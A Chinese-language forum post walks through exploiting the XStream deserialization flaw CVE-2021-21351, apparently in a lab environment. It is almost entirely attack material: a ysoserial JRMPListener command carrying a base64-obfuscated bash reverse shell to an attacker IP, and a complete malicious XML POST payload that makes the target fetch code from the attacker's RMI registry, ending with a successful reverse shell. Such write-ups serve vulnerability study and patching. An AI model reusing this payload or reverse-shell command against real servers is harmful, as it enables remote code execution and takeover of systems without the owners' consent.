xstream 代码执行 (CVE-2021-21351)

CDxiaodong · 发表于 2021-10-13 17:59:24

描述: XStream是一个简单的基于Java库，Java对象序列化到xml，反之亦然(即：可以轻易的将Java对象和xml文档相互转换)。攻击者可以操纵已处理的输入流并替换或注入对象，从而执行从远程服务器加载的任意代码。

打开网页

获取反弹shell

通过攻击机ysoserial通过某一端口实施攻击（此处为6666） java -cp ysoserial.jar ysoserial.exploit.JRMPListener 6666 CommonsCollections6 “bash -c{echo,YmFzaCAtaT4mIC9kZXYvdGNwLzE5Mi4xNjguMTkuMTI4LzIzMzMzIDA+JjE=}|{base64,-d}|{bash,-i}”

同时监听本地某一个端口（23333

然后抓包重新访问该网页，将大佬的poc写入，修改其中的evil-ip和原有的端口为攻击端口6666，并将host-ip改为目标靶机

POST / HTTP/1.1
Host: http://192.168.1.192:20529/
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Content-Type: application/xml
Content-Length: 3123
<java.util.PriorityQueue serialization='custom'>
<unserializable-parents/>
<java.util.PriorityQueue>
      <default>
         <size>2</size>
      </default>
      <int>3</int>
      <javax.naming.ldap.Rdn_-RdnEntry>
         <type>12345</type>
         <value class='com.sun.org.apache.xpath.internal.objects.XString'>
            <m__obj class='string'>com.sun.xml.internal.ws.api.message.Packet@2002fc1d Content</m__obj>
         </value>
      </javax.naming.ldap.Rdn_-RdnEntry>
      <javax.naming.ldap.Rdn_-RdnEntry>
         <type>12345</type>
         <value class='com.sun.xml.internal.ws.api.message.Packet' serialization='custom'>
            <message class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'>
                  <parsedMessage>true</parsedMessage>
                  <soapVersion>SOAP_11</soapVersion>
                  <bodyParts/>
                  <sm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'>
                     <attachmentsInitialized>false</attachmentsInitialized>
                     <nullIter class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'>
                        <aliases class='com.sun.jndi.toolkit.dir.LazySearchEnumerationImpl'>
                              <candidates class='com.sun.jndi.rmi.registry.BindingEnumeration'>
                                 <names>
                                    <string>aa</string>
                                    <string>aa</string>
                                 </names>
                                 <ctx>
                                    <environment/>
                                    <registry class='sun.rmi.registry.RegistryImpl_Stub' serialization='custom'>
                                          <java.rmi.server.RemoteObject>
                                             <string>UnicastRef</string>
                                             <string>192.168.19.128</string>
                                             <int>6666</int>
                                             <long>0</long>
                                             <int>0</int>
                                             <long>0</long>
                                             <short>0</short>
                                             <boolean>false</boolean>
                                          </java.rmi.server.RemoteObject>
                                    </registry>
                                    <host>192.168.202.128</host>
                                    <port>6666</port>
                                 </ctx>
                              </candidates>
                        </aliases>
                     </nullIter>
                  </sm>
            </message>
         </value>
      </javax.naming.ldap.Rdn_-RdnEntry>
</java.util.PriorityQueue>
</java.util.PriorityQueue>

改poc包

成功反弹

		自动登录	找回密码
密码			立即注册